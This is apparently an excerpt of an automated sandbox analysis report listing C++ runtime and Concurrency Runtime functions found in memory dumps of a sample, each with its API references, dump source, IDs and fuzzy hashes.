                                                                                                                                                                                                                                                                    • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                                                                                                                                                                                    • Instruction ID: 59e08c815c588de5c0ee28ceb7b2c987c6e1d7029255c77ed5ff777828fc59c0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92011776400604ABCB24DF66C881EDAB7EAEF48320B108A1EE55A87650DBB0F9448B60
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 00405926
                                                                                                                                                                                                                                                                      • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
                                                                                                                                                                                                                                                                    • __Getcoll.LIBCPMT ref: 00405980
                                                                                                                                                                                                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1836011271-0
                                                                                                                                                                                                                                                                    • Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
                                                                                                                                                                                                                                                                    • Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 024C50D1
                                                                                                                                                                                                                                                                      • Part of subcall function 024CBDAE: __EH_prolog3_GS.LIBCMT ref: 024CBDB5
                                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 024C511C
                                                                                                                                                                                                                                                                    • __Getcoll.LIBCPMT ref: 024C512B
                                                                                                                                                                                                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 024C513B
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1836011271-0
                                                                                                                                                                                                                                                                    • Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                                                                                                                                                                                                                                    • Instruction ID: 36e30c5a337328801767f38a337664196c51b09789e3ddebe6308d06bff41201
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE018875D10309AFDB81EFA9C484B9DB7B1BF54315F60802FD059AB280CB789584CF95
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 024C5B8D
                                                                                                                                                                                                                                                                      • Part of subcall function 024CBDAE: __EH_prolog3_GS.LIBCMT ref: 024CBDB5
                                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 024C5BD8
                                                                                                                                                                                                                                                                    • __Getcoll.LIBCPMT ref: 024C5BE7
                                                                                                                                                                                                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 024C5BF7
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1836011271-0
                                                                                                                                                                                                                                                                    • Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                                                                                                                                                                                                                                    • Instruction ID: 7f4e826561725ce430ae2d31f30f72ea0b42f73d67a3772ca3868240406ece1f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE014875910209AFDB80EFA9D484B9DB7B1BF54315F60802FD059AB280DBB89984CF95
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
                                                                                                                                                                                                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
                                                                                                                                                                                                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
                                                                                                                                                                                                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
• API ID: Compare_exchange_acquire_4std::_
• String ID:
• API String ID: 3973403980-0
• Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
• Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
• Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
• Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D
APIs
• std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024DC170
• std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024DC180
• std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024DC190
• std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024DC1A4
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: Compare_exchange_acquire_4std::_
• String ID:
• API String ID: 3973403980-0
• Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
• Instruction ID: fd19ad043427d46b40b90821db1211e7958cda1eb0dfa16cd4f396e399c813a9
• Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
• Instruction Fuzzy Hash: 0A01193A004129BBDF139E94DC918AE7B66AF25350F048517F928C4170D732D6B2EF81
APIs
• Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB
  • Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
  • Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990
• Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
• Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
• Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
• String ID:
• API String ID: 4284812201-0
• Opcode ID: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
• Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
• Opcode Fuzzy Hash: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
• Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D
APIs
• Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525
  • Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
  • Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4
• GetLastError.KERNEL32 ref: 00413541
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
• __CxxThrowException@8.LIBVCRUNTIME ref: 00413565
  • Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
• String ID:
• API String ID: 1674182817-0
• Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
• Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
• Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
• Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC
APIs
• Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 024D378C
  • Part of subcall function 024D2B16: ___crtGetTimeFormatEx.LIBCMT ref: 024D2B2C
  • Part of subcall function 024D2B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 024D2B4B
• GetLastError.KERNEL32 ref: 024D37A8
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D37BE
• __CxxThrowException@8.LIBVCRUNTIME ref: 024D37CC
  • Part of subcall function 024D28EC: SetThreadPriority.KERNEL32(?,?), ref: 024D28F8
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
• String ID:
• API String ID: 1674182817-0
• Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
• Instruction ID: d2598334a69d68ba9462d9f3fe4cf601aa05e88b38dbfd594def069115570f7a
• Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
• Instruction Fuzzy Hash: 98F027B2A002153AE720FB724C06FBB3A9C9F00741F50086BFC05E3181EAD9D4048AB5
APIs
• Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 024D1342
  • Part of subcall function 024D0BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 024D0BD6
  • Part of subcall function 024D0BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 024D0BF7
• Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 024D1355
• Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 024D1361
• Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 024D136A
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
• String ID:
• API String ID: 4284812201-0
• Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
• Instruction ID: eac07f53f57a1d05a74adbcbdcc8a4ae022a4fffd785b842303492d79dca9dd0
• Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
• Instruction Fuzzy Hash: 92F0B431704704A7EF147EBA087057E31979F55314F24416FE91A9F380DEB59D419A94
APIs
• Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 024DD088
• Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 024DD0AC
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 024DD0BF
• __CxxThrowException@8.LIBVCRUNTIME ref: 024DD0CD
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3657713681-0
                                                                                                                                                                                                                                                                    • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                                                    • Instruction ID: b133972a85dcb78e6fe189d8df57f1c85926d33bdfad2fd17e28cae86ba71ccd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8F05936E00204E3C725FA16D860D5EB37A9ED0B183A0852FD80557289DB31A90ACE62
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
                                                                                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041263B
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3803302727-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                                                    • Instruction ID: 24969db738fe4d1a967b5a52fd3328d3273a2fbbb48021401f3901a8ee12547a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7FF0A03460010AFBCF00EFA5DE46EEF37687B00745F600616B610E20E1EB79DA549768
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Cnd_initX.LIBCPMT ref: 024C5A83
                                                                                                                                                                                                                                                                    • __Cnd_signal.LIBCPMT ref: 024C5A8F
                                                                                                                                                                                                                                                                    • std::_Cnd_initX.LIBCPMT ref: 024C5AA4
                                                                                                                                                                                                                                                                    • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 024C5AAB
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2059591211-0
                                                                                                                                                                                                                                                                    • Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                                                                                                                                                                                    • Instruction ID: e1708fdd5644ad95e6e352a4f0b99c7eb75359d2f58bfffaa21d6bff62617db7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6F0E539400700EFEB657B7BD80571A73E3AF01328F74482FE05A969A0DFBAE8148E55
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 024D286F
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,024D8830,?,?,?,?,00000000,?,00000000), ref: 024D287E
                                                                                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D2894
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024D28A2
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3803302727-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                                                    • Instruction ID: e3f0846953e47bae62c94b55cea0850d469fd2712403c4d290456520c8063172
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60F0A03450020ABBCF00EFB5CD44EAF37B86B00701F200616F921E20A1DB75D6049B64
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • ___crtCreateEventExW.LIBCPMT ref: 0041232C
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
                                                                                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041235E
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 200240550-0
                                                                                                                                                                                                                                                                    • Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                                                    • Instruction ID: 785b6ff49928477fe7b23022ebabbc79c69e7cefd8d4159d1ac4e3541b52c9d2
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01E0D871A0021929E710B7768E03FBF369C6B00B49F54096ABE14E51D3FDACD65042AC
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • ___crtCreateEventExW.LIBCPMT ref: 024D2593
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,024D0DA0), ref: 024D25A1
                                                                                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D25B7
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024D25C5
                                                                                                                                                                                                                                                                    Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
• String ID:
• API String ID: 200240550-0
• Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
• Instruction ID: 4fb4ebef4aa5b2efcda973f871db5de69500fc4089e686306d836a9479c7901b
• Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
• Instruction Fuzzy Hash: 1EE0D86160021539EB10F7764C32F7B369C5B00B41F54085AFD15E21C2FAD5E10449A4
APIs
  • Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
• TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
• GetLastError.KERNEL32 ref: 00423991
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
• __CxxThrowException@8.LIBVCRUNTIME ref: 004239B5
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
• String ID:
• API String ID: 3735082963-0
• Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
• Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
• Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
• Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D
APIs
  • Part of subcall function 024D2959: TlsAlloc.KERNEL32(?,024D0DA0), ref: 024D295F
• TlsAlloc.KERNEL32(?,024D0DA0), ref: 024E3BE6
• GetLastError.KERNEL32 ref: 024E3BF8
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024E3C0E
• __CxxThrowException@8.LIBVCRUNTIME ref: 024E3C1C
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
• String ID:
• API String ID: 3735082963-0
• Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
• Instruction ID: 02904571e3068f448a2adb13cf8600342ef3c3ecb4dba3a42be15e99bcb7cbe2
• Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
• Instruction Fuzzy Hash: 93E061345002056FDB00FF775C5967F3A646A003037100EABE927D31E2EB35D0054E5C
APIs
• GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412537
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412546
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
• __CxxThrowException@8.LIBVCRUNTIME ref: 0041256A
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
• String ID:
• API String ID: 3016159387-0
• Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
• Instruction ID: 7399f334bae95f1f5dd7aa6ec606231f62b338b040d4ba0de61eab0e9ab47a66
• Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
• Instruction Fuzzy Hash: A1E0D87060010AABC700EBB5DE4AAEF73BC7A00605B600166A101E2151EA6CDA44877C
APIs
• GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,024D0DA0), ref: 024D279E
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,024D0DA0), ref: 024D27AD
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D27C3
• __CxxThrowException@8.LIBVCRUNTIME ref: 024D27D1
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
• String ID:
• API String ID: 3016159387-0
• Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
• Instruction ID: 2273669cd7aa61b4e11c449df833e79c751df83d04d4f1c7c7468d3929b81fd5
• Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
